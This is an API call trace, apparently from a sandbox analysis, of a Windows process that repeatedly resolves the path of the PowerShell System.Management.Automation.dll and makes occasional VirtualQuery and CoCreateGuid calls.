	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.848] GetLastError () returned 0x0
	[0054.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.849] GetLastError () returned 0x0
	[0054.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.850] GetLastError () returned 0x0
	[0054.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.850] GetLastError () returned 0x0
	[0054.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.850] GetLastError () returned 0x0
	[0054.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.850] GetLastError () returned 0x0
	[0054.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.850] GetLastError () returned 0x0
	[0054.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.872] GetLastError () returned 0x0
	[0054.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.872] GetLastError () returned 0x0
	[0054.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.872] GetLastError () returned 0x0
	[0054.872] VirtualQuery (in: lpAddress=0x22cbd4, lpBuffer=0x22dbd4, dwLength=0x1c | out: lpBuffer=0x22dbd4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.872] VirtualQuery (in: lpAddress=0x22cc10, lpBuffer=0x22dc10, dwLength=0x1c | out: lpBuffer=0x22dc10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.873] GetLastError () returned 0x0
	[0054.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d974, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.873] GetLastError () returned 0x0
	[0054.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d974, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.873] GetLastError () returned 0x0
	[0054.874] VirtualQuery (in: lpAddress=0x22ccdc, lpBuffer=0x22dcdc, dwLength=0x1c | out: lpBuffer=0x22dcdc*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d9c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.874] GetLastError () returned 0x0
	[0054.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d974, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.874] GetLastError () returned 0x0
	[0054.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d974, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.874] GetLastError () returned 0x0
	[0054.874] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xac499049, Data2=0xfdc9, Data3=0x4760, Data4=([0]=0x8c, [1]=0xa7, [2]=0x4f, [3]=0xfc, [4]=0x56, [5]=0x5d, [6]=0xd0, [7]=0xdb))) returned 0x0
	[0054.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.874] GetLastError () returned 0x0
	[0054.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.874] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.875] GetLastError () returned 0x0
	[0054.875] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2c2d8897, Data2=0xaa80, Data3=0x46b8, Data4=([0]=0xbc, [1]=0x98, [2]=0xf4, [3]=0xe5, [4]=0xaa, [5]=0x33, [6]=0xdd, [7]=0x59))) returned 0x0
	[0054.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.876] GetLastError () returned 0x0
	[0054.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.876] GetLastError () returned 0x0
	[0054.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.876] GetLastError () returned 0x0
	[0054.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.876] GetLastError () returned 0x0
	[0054.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.876] GetLastError () returned 0x0
	[0054.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.876] GetLastError () returned 0x0
	[0054.876] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x64e5cd5f, Data2=0x4716, Data3=0x4664, Data4=([0]=0xb8, [1]=0xe2, [2]=0xb4, [3]=0x1a, [4]=0x95, [5]=0xa, [6]=0x9e, [7]=0x6b))) returned 0x0
	[0054.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.877] GetLastError () returned 0x0
	[0054.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.877] GetLastError () returned 0x0
	[0054.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.877] GetLastError () returned 0x0
	[0054.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.877] GetLastError () returned 0x0
	[0054.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.877] GetLastError () returned 0x0
	[0054.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.877] GetLastError () returned 0x0
	[0054.878] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x1a07cd50, Data2=0xd2a8, Data3=0x4a98, Data4=([0]=0x92, [1]=0x59, [2]=0xef, [3]=0xb7, [4]=0xf3, [5]=0x7e, [6]=0xd3, [7]=0x37))) returned 0x0
	[0054.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.878] GetLastError () returned 0x0
	[0054.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.878] GetLastError () returned 0x0
	[0054.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.878] GetLastError () returned 0x0
	[0054.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.878] GetLastError () returned 0x0
	[0054.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.878] GetLastError () returned 0x0
	[0054.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.878] GetLastError () returned 0x0
	[0054.879] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x1e1de57f, Data2=0x6e7, Data3=0x4f4e, Data4=([0]=0x8f, [1]=0x95, [2]=0x5f, [3]=0x7d, [4]=0xb7, [5]=0x3a, [6]=0xb2, [7]=0x3b))) returned 0x0
	[0054.879] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xe93b1aa3, Data2=0x9eee, Data3=0x4398, Data4=([0]=0xa6, [1]=0x54, [2]=0x35, [3]=0x5b, [4]=0x91, [5]=0xda, [6]=0x0, [7]=0xf4))) returned 0x0
	[0054.879] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa2559029, Data2=0xe37a, Data3=0x4739, Data4=([0]=0xab, [1]=0x1d, [2]=0x6f, [3]=0xde, [4]=0x1a, [5]=0x12, [6]=0xdd, [7]=0xd0))) returned 0x0
